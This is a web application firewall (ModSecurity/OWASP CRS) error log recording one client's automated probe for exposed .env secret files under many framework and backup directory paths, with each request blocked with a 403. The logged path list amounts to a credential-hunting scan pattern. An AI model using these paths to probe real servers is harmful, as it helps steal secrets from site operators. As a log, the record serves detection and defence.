[Mon May 11 18:07:20.933187 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/nest/.env"] [unique_id "agH-uA-Qm4vhlWBPlMjeHAAAAAo"]
[Mon May 11 18:07:20.933567 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uA-Qm4vhlWBPlMjeHAAAAAo"]
[Mon May 11 18:07:21.189670 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/react/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHgAAAAo"]
[Mon May 11 18:07:21.189909 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/react/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHgAAAAo"]
[Mon May 11 18:07:21.190199 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHgAAAAo"]
[Mon May 11 18:07:21.704313 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vue/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHwAAAAo"]
[Mon May 11 18:07:21.704544 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vue/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHwAAAAo"]
[Mon May 11 18:07:21.704829 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uQ-Qm4vhlWBPlMjeHwAAAAo"]
[Mon May 11 18:07:21.998680 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/angular/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeIAAAAAo"]
[Mon May 11 18:07:21.998937 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/angular/.env"] [unique_id "agH-uQ-Qm4vhlWBPlMjeIAAAAAo"]
[Mon May 11 18:07:21.999255 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uQ-Qm4vhlWBPlMjeIAAAAAo"]
[Mon May 11 18:07:22.353958 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/svelte/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIQAAAAo"]
[Mon May 11 18:07:22.354227 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/svelte/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIQAAAAo"]
[Mon May 11 18:07:22.395059 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ug-Qm4vhlWBPlMjeIQAAAAo"]
[Mon May 11 18:07:22.642102 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vite/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIgAAAAo"]
[Mon May 11 18:07:22.642350 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vite/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIgAAAAo"]
[Mon May 11 18:07:22.642658 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ug-Qm4vhlWBPlMjeIgAAAAo"]
[Mon May 11 18:07:22.972383 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backup/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIwAAAAo"]
[Mon May 11 18:07:22.972697 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backup/.env"] [unique_id "agH-ug-Qm4vhlWBPlMjeIwAAAAo"]
[Mon May 11 18:07:22.973068 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-ug-Qm4vhlWBPlMjeIwAAAAo"]
[Mon May 11 18:07:23.603907 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backups/.env"] [unique_id "agH-uw-Qm4vhlWBPlMjeKgAAAAo"]
[Mon May 11 18:07:23.604174 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backups/.env"] [unique_id "agH-uw-Qm4vhlWBPlMjeKgAAAAo"]
[Mon May 11 18:07:23.604482 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-uw-Qm4vhlWBPlMjeKgAAAAo"]
[Mon May 11 18:07:24.061914 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/old/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeLAAAAAo"]
[Mon May 11 18:07:24.062166 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/old/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeLAAAAAo"]
[Mon May 11 18:07:24.062458 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vA-Qm4vhlWBPlMjeLAAAAAo"]
[Mon May 11 18:07:24.699779 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/tmp/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeMAAAAAo"]
[Mon May 11 18:07:24.700020 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/tmp/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeMAAAAAo"]
[Mon May 11 18:07:24.701779 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vA-Qm4vhlWBPlMjeMAAAAAo"]
[Mon May 11 18:07:24.977270 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/temp/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeMQAAAAo"]
[Mon May 11 18:07:24.977522 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/temp/.env"] [unique_id "agH-vA-Qm4vhlWBPlMjeMQAAAAo"]
[Mon May 11 18:07:24.977831 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vA-Qm4vhlWBPlMjeMQAAAAo"]
[Mon May 11 18:07:25.227707 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/lab/.env"] [unique_id "agH-vQ-Qm4vhlWBPlMjeMwAAAAo"]
[Mon May 11 18:07:25.227955 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/lab/.env"] [unique_id "agH-vQ-Qm4vhlWBPlMjeMwAAAAo"]
[Mon May 11 18:07:25.228271 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vQ-Qm4vhlWBPlMjeMwAAAAo"]
[Mon May 11 18:07:25.707773 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cronlab/.env"] [unique_id "agH-vQ-Qm4vhlWBPlMjeNAAAAAo"]
[Mon May 11 18:07:25.708010 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cronlab/.env"] [unique_id "agH-vQ-Qm4vhlWBPlMjeNAAAAAo"]
[Mon May 11 18:07:25.708300 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-vQ-Qm4vhlWBPlMjeNAAAAAo"]
[Mon May 11 18:07:26.035830 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cron/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeNQAAAAo"]
[Mon May 11 18:07:26.036073 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cron/.env"] [unique_id "agH-vg-Qm4vhlWBPlMjeNQAAAAo"]
